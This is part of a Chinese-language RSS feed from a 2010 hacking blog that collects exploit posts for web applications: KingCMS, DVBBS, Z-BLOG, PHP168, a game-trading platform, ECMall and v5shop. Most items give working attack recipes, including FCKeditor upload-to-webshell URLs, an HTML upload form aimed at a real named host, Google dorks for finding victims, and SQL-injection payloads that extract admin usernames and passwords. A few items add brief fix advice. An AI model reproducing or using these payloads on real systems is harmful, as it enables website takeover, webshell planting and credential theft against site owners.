			<guid>http://www.0354hk.com/default.asp?id=481</guid>
		<description><![CDATA[影响版本：KingCMS ASP 5.0/5.1 <br/>官方地址：<a href="http://www.kingcms.com/" target="_blank" rel="external">http://www.kingcms.com/</a>&nbsp;&nbsp;<br/>漏洞描述： KingCMS ASP是基于ASP+ACCESS构架的一款很不错的CMS系统，前台全部静态化处理，新一代 KingCMS 提供了更好的界面、更多的开发余地、更强大的扩展能力，现今也受到不少站长的欢迎。但是在没有正确设置系统的情况下会爆出一个致命的弱点，特别是针对比较懒的站长。&nbsp;&nbsp;<br/><br/>漏洞算不上0day，但是却具有0day的危害效果，主要是因管理为对后台路径和编辑器路径做更改，系统是使用FCKeditor编辑器，这个编辑器的漏洞大家都比较熟悉了，下面就给出具体利用方法。<br/><br/>利用前提：管理员未更改后台路径以及FCKeditor编辑器路径做更改。<br/><br/>后台地址：默认是/admin/system/login.asp，输入admin路径可自动跳转到登陆口。<br/><br/>编辑器路径：/admin/system/editor/<br/><br/>利用方式：访问<a href="http://www.xxx.com/admin/system/editor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=Cr" target="_blank" rel="external">http://www.xxx.com/admin/system/editor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=Cr</a>&#101;ateFolder&amp;Type=Image&amp;CurrentFolder=/qing.asp&amp;NewFolderName=qing.asp后在/up_files/image/目录下创建一个明文qing.asp的文件夹。<br/><br/>然后访问<a href="http://www.xxx.com/admin/system/editor/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image" target="_blank" rel="external">http://www.xxx.com/admin/system/editor/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image</a>&amp;Connector=../../connectors/asp/connector.asp，选择刚创建的qing.asp文件夹并上传图片木马，可以上传包含一句话内容的图片，然后使用一句话客户端连接。<br/><br/>另外该系统后台也是比较脆弱的，若能成功登陆后台拿webshell比较简单，后台中有个webftp的功能，可以上传任意文件。默认数据库地址为/db/King#Content#Management#System.mdb，下载的时候将#替换成%23后下载。<br/><br/>针对该系统的关键词未确定下来，主要是系统不好确定关键词，前台全部为静态的，有兴趣的朋友可以去官网下载一个来研究下 <br/><br/>安全建议：升级fckeditor到最新版本。<br/><br/>文章转载自『非安全中国网』地址: <a href="http://www.sitedir.com.cn/exploit-1255.html" target="_blank" rel="external">http://www.sitedir.com.cn/exploit-1255.html</a>]]></description>
		</item>
		
			<item>
			<link>http://www.0354hk.com/article.asp?id=480</link>
			<title><![CDATA[动网（DVBBS）PHP论坛preview.php代码执行漏洞]]></title>
			<author>chenliangsx@gmail.com(admin)</author>
			<category><![CDATA[漏洞相关]]></category>
			<pubDate>Thu,02 Sep 2010 22:08:56 +0800</pubDate>
			<guid>http://www.0354hk.com/default.asp?id=480</guid>
		<description><![CDATA[动网（DVBBS）论坛系统是一个采用PHP和MYSQL的数据架构的高性能网站论坛解决方案。<br/><br/>在文件preview.php中：<br/>require printout(&#39;preview&#39;); //第9行<br/>……<br/>函数printout在文件inc/ dv_clsmain.php中：<br/>function printout($template,$ext=&#34;tpl.php&#34;){ //第464行<br/>文件最后包含了templates\default\ preview.tpl.php文件<br/>……<br/>在文件templates\default\ preview.tpl.php中：<br/>$theBody =&amp; Dv_CodeProcess($theBody, $tmpuserinfo, Ubblist($theBody).&#39;39,&#39;, 1, 0); //第31行<br/>&amp; Dv_CodeProcess函数在文件inc/dv_code.php文件中：<br/>function &amp;Dv_CodeProcess(&amp;$code,&amp;$currUserInfo,$ubblists,$PostType=1,$sType=1) //第332行<br/>……<br/>$arrPattern[] = &#39;#\[url\s*=\s*([^\]]+)](.*?)\[img](.+?)\[\/img](.*?)\[/url]#iesm&#39;;&nbsp;&nbsp; //第415行<br/>$arrRepl[] = &#39;\&#39;&lt;a href=&#34;\&#39;.str_filter_xss(&#34;$1&#34;).\&#39;&#34; target=&#34;_blank&#34;&gt;$2&lt;img src=&#34;\&#39;.str_filter_xss(&#34;$3&#34;).\&#39;&#34; border=&#34;0&#34;/ &gt;$4&lt;/a&gt;\&#39;&#39;;<br/>……<br/>$returnval = preg_replace( $arrPattern ,$arrRepl ,$code ); //第861行<br/>函数preg_replace当第一个参数的正则表达式有e符号的时候，第二个参数的字符串当做PHP代码执行。]]></description>
		</item>
		
			<item>
			<link>http://www.0354hk.com/article.asp?id=478</link>
			<title><![CDATA[Z-BLOG后台getshell方法]]></title>
			<author>chenliangsx@gmail.com(admin)</author>
			<category><![CDATA[漏洞相关]]></category>
			<pubDate>Thu,29 Jul 2010 23:58:30 +0800</pubDate>
			<guid>http://www.0354hk.com/default.asp?id=478</guid>
		<description><![CDATA[Z-BLOG后台利用插件拿WEBSHELL<br/>怎么进后台自己想办法，进入后台<br/>插件管理--TotoroⅡ插件，导出此插件，下载本地利用文本形式打开<br/><img src="http://hiphotos.baidu.com/5427518/pic/item/dc8af109c4c4f28e3ac7638b.jpg" border="0" alt=""/><br/>base64加密的<br/>PCVAIENPREVQQUdFPTY1MDAxICU+DQo8JQ0KJy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v<br/>Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8N<br/>CicvLyDmj5Lku7blupTnlKg6ICAgIFotQmxvZyAxLjcNCicvLyDmj5Lku7bliLbkvZw6ICAg<br/>IA0KJy8vIOWkhyAgICDms6g6ICAgIA0KJy8vIOacgOWQjuS/ruaUue+8miAgIA0KJy8vIOac<br/>gOWQjueJiOacrDogICAgDQonLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v<br/>Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLw0KJT4NCjwlIE9w<br/>dGlvbiBFeHBsaWNpdCAlPg0KPCUgT24gRXJyb3IgUmVzdW1lIE5leHQgJT4NCjwlIFJlc3Bv<br/>bnNlLkNoYXJzZXQ9IlVURi04IiAlPg0KPCUgUmVzcG9uc2UuQnVmZmVyPVRydWUgJT4NCjwh<br/>LS0gI2luY2x1ZGUgZmlsZT0iLi4vLi4vY19vcHRpb24uYXNwIiAtLT4NCjwhLS0gI2luY2x1<br/>ZGUgZmlsZT0iLi4vLi4vZnVuY3Rpb24vY19mdW5jdGlvbi5hc3AiIC0tPg0KPCEtLSAjaW5j<br/>bHVkZSBmaWxlPSIuLi8uLi9mdW5jdGlvbi9jX2Z1bmN0aW9uX21kNS5hc3AiIC0tPg0KPCEt<br/>LSAjaW5jbHVkZSBmaWxlPSIuLi8uLi9mdW5jdGlvbi9jX3N5c3RlbV9saWIuYXNwIiAtLT4N<br/>CjwhLS0gI2luY2x1ZGUgZmlsZT0iLi4vLi4vZnVuY3Rpb24vY19zeXN0ZW1fYmFzZS5hc3Ai<br/>IC0tPg0KPCEtLSAjaW5jbHVkZSBmaWxlPSIuLi8uLi9mdW5jdGlvbi9jX3N5c3RlbV9ldmVu<br/>dC5hc3AiIC0tPg0KPCEtLSAjaW5jbHVkZSBmaWxlPSIuLi8uLi9mdW5jdGlvbi9jX3N5c3Rl<br/>bV9wbHVnaW4uYXNwIiAtLT4NCjwhLS0gI2luY2x1ZGUgZmlsZT0iLi4vLi4vcGx1Z2luL3Bf<br/>Y29uZmlnLmFzcCIgLS0+DQo8JQ0KDQpDYWxsIFN5c3RlbV9Jbml0aWFsaXplKCkNCg0KJ+aj<br/>gOafpemdnuazlemTvuaOpQ0KQ2FsbCBDaGVja1JlZmVyZW5jZSgiIikNCg0KJ+ajgOafpead<br/>g+mZkA0KSWYgQmxvZ1VzZXIuTGV2ZWw+MSBUaGVuIENhbGwgU2hvd0Vycm9yKDYpIA0KDQpJ<br/>ZiBDaGVja1BsdWdpblN0YXRlKCJUb3Rvcm8iKT1GYWxzZSBUaGVuIENhbGwgU2hvd0Vycm9y<br/>KDQ4KQ0KJT4NCjwlDQoNCkRpbSBhY3QsZGVsaWQNCmFjdD1SZXF1ZXN0LkZvcm0oImFjdCIp<br/>DQpkZWxpZD1SZXF1ZXN0LkZvcm0oImlkIikNCkRpbSBzdHJDb250ZW50DQpEaW0gc3RyWkNf<br/>VE9UT1JPX0JBRFdPUkRfTElTVCxTdHJUTVAsTkVXX0JBRFdPUkQsYm9sVE9UT1JPX0RFTF9E<br/>SVJFQ1RMWQ0Kc3RyQ29udGVudD1Mb2FkRnJvbUZpbGUoQmxvZ1BhdGggJiAiL1BMVUdJTi90<br/>b3Rvcm8vaW5jbHVkZS5hc3AiLCJ1dGYtOCIpDQpDYWxsIExvYWRWYWx1ZUZvclNldHRpbmco<br/>c3RyQ29udGVudCxUcnVlLCJTdHJpbmciLCJUT1RPUk9fQkFEV09SRF9MSVNUIixzdHJaQ19U<br/>T1RPUk9fQkFEV09SRF9MSVNUKQ0KQ2FsbCBMb2FkVmFsdWVGb3JTZXR0aW5nKHN0ckNvbnRl<br/>bnQsVHJ1ZSwiQm9vbGVhbiIsIlRPVE9ST19ERUxfRElSRUNUTFkiLGJvbFRPVE9ST19ERUxf<br/>RElSRUNUTFkpDQpJZiBhY3Q9ImRlbGNtIiB0aGVuDQoNCglEaW0gb2JqQ29tbWVudA0KCVNl<br/>dCBvYmpDb21tZW50PU5ldyBUQ29tbWVudA0KCUlmIG9iakNvbW1lbnQuTG9hZEluZm9ieUlE<br/>KGRlbGlkKSBUaGVuDQoJDQoJCVN0clRNUD1UT1RPUk9fY2hlY2tTdHIob2JqQ29tbWVudC5I<br/>b21lUGFnZSAmICJ8IiAmIG9iakNvbW1lbnQuQ29udGVudCxzdHJaQ19UT1RPUk9fQkFEV09S<br/>RF9MSVNUKQ0KCQlzdHJaQ19UT1RPUk9fQkFEV09SRF9MSVNUPXN0clpDX1RPVE9ST19CQURX<br/>T1JEX0xJU1QgJiBTdHJUTVANCgkJTkVXX0JBRFdPUkQ9U3RyVE1QDQoJCVJlc3BvbnNlLldy<br/>aXRlIFRvdG9yb19kZWFsSXQob2JqQ29tbWVudCxib2xUT1RPUk9fREVMX0RJUkVDVExZKQ0K<br/>DQoJRW5kIElmCQkNCgkJDQpFbHNlaWYgYWN0PSJkZWx0YiIgdGhlbg0KDQoJRGltIG9ialRy<br/>YWNrQmFjaw0KCVNldCBvYmpUcmFja0JhY2s9TmV3IFRUcmFja0JhY2sNCglJZiBvYmpUcmFj<br/>a0JhY2suTG9hZEluZm9ieUlEKGRlbGlkKSBUaGVuDQoJDQoJCVN0clRNUD1UT1RPUk9fY2hl<br/>Y2tTdHIob2JqVHJhY2tCYWNrLlVSTCAmICJ8IiAmIG9ialRyYWNrQmFjay5FeGNlcnB0LHN0<br/>clpDX1RPVE9ST19CQURXT1JEX0xJU1QpDQoJCXN0clpDX1RPVE9ST19CQURXT1JEX0xJU1Q9<br/>c3RyWkNfVE9UT1JPX0JBRFdPUkRfTElTVCAmIFN0clRNUA0KCQlORVdfQkFEV09SRD1TdHJU<br/>TVANCgkJUmVzcG9uc2UuV3JpdGUgVG90b3JvX2RlYWxJdChvYmpUcmFja0JhY2ssYm9sVE9U<br/>T1JPX0RFTF9ESVJFQ1RMWSkNCgkNCglFbmQgSWYNCgkNCkVuZCBJZg0KDQpJZiBsZWZ0KHN0<br/>clpDX1RPVE9ST19CQURXT1JEX0xJU1QsMSk9InwiIHRoZW4gc3RyWkNfVE9UT1JPX0JBRFdP<br/>UkRfTElTVD1SaWdodChzdHJaQ19UT1RPUk9fQkFEV09SRF9MSVNULCBMZW4oc3RyWkNfVE9U<br/>T1JPX0JBRFdPUkRfTElTVCkgLSAxKQ0KQ2FsbCBTYXZlVmFsdWVGb3JTZXR0aW5nKHN0ckNv<br/>bnRlbnQsVHJ1ZSwiU3RyaW5nIiwiVE9UT1JPX0JBRFdPUkRfTElTVCIsc3RyWkNfVE9UT1JP<br/>X0JBRFdPUkRfTElTVCkNCkNhbGwgU2F2ZVRvRmlsZShCbG9nUGF0aCAmICIvUExVR0lOL3Rv<br/>dG9yby9pbmNsdWRlLmFzcCIsc3RyQ29udGVudCwidXRmLTgiLEZhbHNlKQ0KJ0lmIE5FV19C<br/>QURXT1JEPD4iIiBUaGVuIFJlc3BvbnNlLndyaXRlICIsVG90b3Jv4oWh5paw5aKe5LiL5YiX<br/>6buR6K+N77yaICIgJiBSaWdodChORVdfQkFEV09SRCwgTGVuKE5FV19CQURXT1JEKSAtIDEp<br/>DQoNCiU+DQo8JQ0KRnVuY3Rpb24gVE9UT1JPX2NoZWNrU3RyKHN0clRvQ2hlY2ssQkFEV09S<br/>RF9MSVNUKQ0KCQlEaW0gb2JqUmVnLG9iak1hdGNoZXMsTWF0Y2gNCgkJU2V0IG9ialJlZyA9<br/>IE5ldyBSZWdFeHANCgkJb2JqUmVnLklnbm9yZUNhc2UgPSBUcnVlDQoJCW9ialJlZy5HbG9i<br/>YWwgPSBUcnVlDQoJCW9ialJlZy5QYXR0ZXJuID0gImh0dHA6Ly8oW1x3LV0rXC4pK1tcdy1d<br/>KyINCgkJU2V0IG9iak1hdGNoZXMgPSBvYmpSZWcuRXhlY3V0ZShzdHJUb0NoZWNrKQ0KCQlG<br/>b3IgRWFjaCBNYXRjaCBJbiBvYmpNYXRjaGVzDQoJCQlJZiBUb3Rvcm9fY2hlY2tOZXdCYWRX<br/>b3JkKE1hdGNoLlZhbHVlLEJBRFdPUkRfTElTVCAmIFRPVE9ST19jaGVja1N0cikgdGhlbg0K<br/>CQkJCVRPVE9ST19jaGVja1N0cj1UT1RPUk9fY2hlY2tTdHIgJiAifCIgJiBSaWdodChNYXRj<br/>aC5WYWx1ZSwgTGVuKE1hdGNoLlZhbHVlKSAtIDcpDQoJCQlFbmQgaWYNCgkJTmV4dA0KCQlT<br/>ZXQgb2JqUmVnID0gTm90aGluZw0KCQlTZXQgb2JqTWF0Y2hlcyA9IE5vdGhpbmcNCgkJU2V0<br/>IE1hdGNoID0gTm90aGluZw0KRW5kIEZ1bmN0aW9uDQoNCkZ1bmN0aW9uIFRvdG9yb19jaGVj<br/>a05ld0JhZFdvcmQoY29udGVudCxCQURXT1JEX0xJU1QpDQoNCglUb3Rvcm9fY2hlY2tOZXdC<br/>YWRXb3JkPVRydWUNCglEaW0gaSxqDQoJaj0wDQogICAgRGltIHN0ckZpbHRlcg0KICAgIHN0<br/>ckZpbHRlciA9IFNwbGl0KEJBRFdPUkRfTElTVCwgInwiKQ0KCUZvciBpID0gMCBUbyBVQm91<br/>bmQoc3RyRmlsdGVyKQ0KCQlJZiBzdHJGaWx0ZXIoaSk8PiIiIFRoZW4NCgkJCUlmIEluU3Ry<br/>IChMQ2FzZShjb250ZW50KSwgTENhc2Uoc3RyRmlsdGVyKGkpKSkgPiAwIFRoZW4NCgkJCQlU<br/>b3Rvcm9fY2hlY2tOZXdCYWRXb3JkPUZhbHNlDQoJCQkJRXhpdCBGb3INCgkJCUVuZCBJZg0K<br/>CQlFbmQgSWYNCiAgICBOZXh0DQoNCkVuZCBGdW5jdGlvbg0KDQoNCkZ1bmN0aW9uIFRvdG9y<br/>b19kZWFsSXQob2JqVG9EZWFsLGJvbERlbCkNCg0KCURpbSBsb2dJZA0KCWxvZ0lkPW9ialRv<br/>RGVhbC5sb2dfSUQNCg0KCUlmIGJvbERlbCBUaGVuDQoJCUlmIG9ialRvRGVhbC5EZWwoKSBU<br/>aGVuIFRvdG9yb19kZWFsSXQgPSAi5Yig6Zmk5oiQ5YqfIg0KCUVsc2UNCgkJb2JqVG9EZWFs<br/>LmxvZ19JRD0tMS1vYmpUb0RlYWwubG9nX0lEDQoJCUlmIG9ialRvRGVhbC5Qb3N0IFRoZW4g<br/>VG90b3JvX2RlYWxJdCA9ICLlt7LliqDlhaXlrqHmoLgiDQoJRW5kIElmDQoJDQoJQ2FsbCBC<br/>dWlsZEFydGljbGUobG9nSWQsRmFsc2UsRmFsc2UpDQoJQ2FsbCBTZXRCbG9nSGludChOdWxs<br/>LFRydWUsTnVsbCkNCglTZXQgb2JqVG9EZWFsID0gTm90aGluZwkNCgkNCkVuZCBGdW5jdGlv<br/>bg0KJT4=<br/>自己用一句话或小马去base64加密下替换之，修改Totoro/ajaxdel.asp文件名，再进后台删了这个插件重新上传安装下，你的SHELL地址就是PLUGIN/Totoro/xxxx.asp了]]></description>
		</item>
		
			<item>
			<link>http://www.0354hk.com/article.asp?id=476</link>
			<title><![CDATA[PHP168 V6.02 鸡肋漏洞]]></title>
			<author>chenliangsx@gmail.com(admin)</author>
			<category><![CDATA[漏洞相关]]></category>
			<pubDate>Sat,24 Jul 2010 21:25:52 +0800</pubDate>
			<guid>http://www.0354hk.com/default.asp?id=476</guid>
		<description><![CDATA[无意间发现个 PHP168 V6.02的 BUG<br/>跟之前那个 job 下载任意文件性质差不多<br/>只不过这次是把任意文件再拷贝为一份jpg出来！附加一个爆路<br/><img src="http://hiphotos.baidu.com/5427518/pic/item/f91b320fe973daacaa64571a.jpg" border="0" alt=""/><br/>漏洞文件出现在 “do/cutimg.php”<br/>if($action==&#34;cutimg&#34;){<br/>$NewPic=str_replace($webdb[www_url],&#34;&#34;,$uploadfile);<br/>$NewPic=PHP168_PATH.$NewPic;<br/>include(PHP168_PATH.&#34;inc/waterimage.php&#34;);<br/>if($nextpic<br/>虽然无法直接拿shell，但是对渗透又多了一条路可走~~<br/>利用方法<br/><img src="http://hiphotos.baidu.com/5427518/pic/item/f5fa04588481929f9d82041a.jpg" border="0" alt=""/><br/>]]></description>
		</item>
		
			<item>
			<link>http://www.0354hk.com/article.asp?id=475</link>
			<title><![CDATA[华速网游交易平台oday]]></title>
			<author>chenliangsx@gmail.com(admin)</author>
			<category><![CDATA[漏洞相关]]></category>
			<pubDate>Sat,24 Jul 2010 21:24:41 +0800</pubDate>
			<guid>http://www.0354hk.com/default.asp?id=475</guid>
		<description><![CDATA[程序：华速网游交易平台 <br/>漏洞说明:上传，暴库 <br/>google关键字: inurl:list_buy.asp?class_1<br/><br/>EXP测试：<br/>（复制代码保存为html文件）<br/><br/><br/><br/>&lt;html&gt;<br/>&lt;head&gt;<br/>&lt;meta http-equiv=&#34;Content-Type&#34; content=&#34;text/html; charset=gb2312&#34;&gt;<br/>&lt;link href=&#34;css/manage.css&#34; rel=&#34;stylesheet&#34; type=&#34;text/css&#34;&gt;<br/>&lt;/head&gt;<br/>&lt;body&gt;<br/>&lt;form name=&#34;form1&#34; method=&#34;post&#34; action=&#34;<a href="http://hsgame.hs173.cn/upfile.asp" target="_blank" rel="external">http://hsgame.hs173.cn/upfile.asp</a>&#34; enctype=&#34;multipart/form-data&#34; &gt;<br/>&lt;div id=&#34;esave&#34; style=&#34;position:absolute; top:18px; left:40px; z-index:10; visibility:hidden&#34;&gt; <br/>&lt;TABLE WIDTH=340 BORDER=0 CELLSPACING=0 CELLPADDING=0&gt;<br/>&lt;TR&gt;&lt;td width=20%&gt;&lt;/td&gt;<br/>&lt;TD bgcolor=#ff0000 width=&#34;60%&#34;&gt; <br/>&lt;TABLE WIDTH=100% height=120 BORDER=0 CELLSPACING=1 CELLPADDING=0&gt;<br/>&lt;TR&gt; <br/>&lt;td bgcolor=#ffffff align=center&gt;&lt;font color=red&gt;正在上传文件，请稍候...&lt;/font&gt;&lt;/td&gt;<br/>&lt;/tr&gt;<br/>&lt;/table&gt;<br/>&lt;/td&gt;&lt;td width=20%&gt;&lt;/td&gt;<br/>&lt;/tr&gt;&lt;/table&gt;&lt;/div&gt;<br/>&lt;table class=&#34;tableBorder&#34; width=&#34;90%&#34; border=&#34;0&#34; align=&#34;center&#34; cellpadding=&#34;3&#34; cellspacing=&#34;1&#34; bgcolor=&#34;#FFFFFF&#34;&gt;<br/>&lt;tr&gt; <br/>&lt;td align=&#34;center&#34;&gt;&lt;b&gt;&lt;font color=&#34;#ffffff&#34;&gt;图片上传 <br/>&lt;input type=&#34;hidden&#34; name=&#34;filepath&#34; value=&#34;/a.asp;aa&#34;&gt;<br/>&lt;input type=&#34;hidden&#34; name=&#34;filelx&#34; value=&#34;&#34;&gt;<br/>&lt;input type=&#34;hidden&#34; name=&#34;EditName&#34; value=&#34;&#34;&gt;<br/>&lt;input type=&#34;hidden&#34; name=&#34;FormName&#34; value=&#34;&#34;&gt;<br/>&lt;input type=&#34;hidden&#34; name=&#34;act&#34; value=&#34;uploadfile&#34;&gt;&lt;/font&gt;&lt;/b&gt;<br/>&lt;/td&gt;<br/>&lt;/tr&gt;<br/>&lt;tr &gt; <br/>&lt;td align=&#34;center&#34; id=&#34;upid&#34; height=&#34;80&#34;&gt;选择文件: <br/>&lt;input type=&#34;file&#34; name=&#34;file1&#34; size=&#34;40&#34; class=&#34;tx1&#34; value=&#34;&#34;&gt;<br/>&lt;input class=btn type=&#34;submit&#34; name=&#34;Submit&#34; value=&#34;开始上传&#34; class=&#34;button&#34; onClick=&#34;javascript:mysub()&#34;&gt;<br/>&lt;/td&gt;<br/>&lt;/tr&gt;<br/>&lt;/table&gt;<br/>&lt;/form&gt;<br/>&lt;/body&gt;<br/>&lt;/html&gt;<br/><br/><br/>上传完毕，右键查看源码，上传的马就在根目录之下。<br/>如果上传不了的话，把&lt;input type=&#34;hidden&#34; name=&#34;filepath&#34; value=&#34;/a.asp;aa&#34;&gt;的value的值修改为“/upfile/a.asp;aaa”，图片目录应该是可写的。<br/><br/><br/>google关键字: inurl:list_buy.asp?class_1<br/><br/><br/>如果上传失效的话，可以直接访问inc/config.asp文件，暴出数据库地址，进后台拿shell。<br/><br/>]]></description>
		</item>
		
			<item>
			<link>http://www.0354hk.com/article.asp?id=474</link>
			<title><![CDATA[ECMall 2.2 app/groupbuy.app.php 延迟注射漏洞]]></title>
			<author>chenliangsx@gmail.com(admin)</author>
			<category><![CDATA[漏洞相关]]></category>
			<pubDate>Sat,24 Jul 2010 21:23:46 +0800</pubDate>
			<guid>http://www.0354hk.com/default.asp?id=474</guid>
		<description><![CDATA[代码分析<br/>ECMall 社区电子商务系统(简称ECMall)是上海商派网络科技有限公司继ECShop 之后推出的又一个电子商务姊妹产品app\groupbuy.app.php:26:function index(){$id = empty($_GET[&#39;&#39;id&#39;&#39;]) ? 0 : $_GET[&#39;&#39;id&#39;&#39;];&nbsp;&nbsp;//id未过滤if (!$id){$this-&gt;show_warning(‘no_such_groupbuy’);return false;}// 团购信息$group = $this-&gt;_groupbuy_mod-&gt;get(array(‘conditions’ =&gt; ‘group_id=’ . $id . ‘ AND gb.state&lt;&gt;’ . GROUP_PENDING,&nbsp;&nbsp; //好的，进去了！！‘join’ =&gt; ‘belong_store’,‘fields’ =&gt; ‘gb.*,s.owner_name’));if (empty($group))&nbsp;&nbsp;&nbsp;&nbsp;//很多时候根本没有团购信息，所以是延迟注射了{$this-&gt;show_warning(‘no_such_groupbuy’);return;}<br/><br/>测试方法<br/>【sitedir.com.cn】<br/>本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!/index.php?app=groupbuy&amp;act=index&amp;id=2 and if((sel&#101;ct ascii(mid(user_name,1,1)) from ecm_member wh&#101;re user_id=1)=97,Benchmark(3000000,md5(1)),1)%23/index.php?app=groupbuy&amp;act=index&amp;id=2%20and%20if((sel&#101;ct%20length(password)%20from%20ecm_member%20wh&#101;re%20user_id=1)=32,benchmark(1000000,md5(1)),1)–<br/>]]></description>
		</item>
		
			<item>
			<link>http://www.0354hk.com/article.asp?id=473</link>
			<title><![CDATA[v5shop 网上商城系统oday]]></title>
			<author>chenliangsx@gmail.com(admin)</author>
			<category><![CDATA[漏洞相关]]></category>
			<pubDate>Sun,18 Jul 2010 12:51:45 +0800</pubDate>
			<guid>http://www.0354hk.com/default.asp?id=473</guid>
		<description><![CDATA[漏洞文件：cart.aspx&nbsp;&nbsp; <br/><br/>关键字：services.aspxid=&nbsp;&nbsp;<br/>inurl:scoreindex.aspx&nbsp;&nbsp;<br/><br/>默认后台地址：weblogin/Login.aspx <br/><br/>以下是测试EXP：<br/><br/>cart.aspx?act=buy&amp;id=1 and (Sel&#101;ct Top 1 char(124)%2BisNull(cast([Name] as varchar(8000)),char(32))%2Bchar(124)%2BisNull(cast([Pass] as varchar(8000)),char(32))%2Bchar(124) From (Sel&#101;ct Top 4 [Name],[Pass] From [Web_Admin] Wh&#101;re 1=1 o&#114;der by [Name],[Pass]) T o&#114;der by [Name] desc,[Pass] desc)&gt;0 --<br/><br/><br/><br/>weblogin/System_Config_Operate.aspx&nbsp;&nbsp;<br/>后台上传水印.可以直接上传大马.&nbsp;&nbsp;<br/><br/><br/>非安全中国安全建议：<br/>目前官方没有发布相关补丁或升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本<br/>www.v5shop.com.cn&nbsp;&nbsp;（官网网站）<br/>临时修复方法，把cart.aspx临时改名<br/>文章转载自『非安全中国网』地址: <a href="http://www.sitedir.com.cn/exploit-1231.html" target="_blank" rel="external">http://www.sitedir.com.cn/exploit-1231.html</a>]]></description>
		</item>
		
</channel>
</rss>
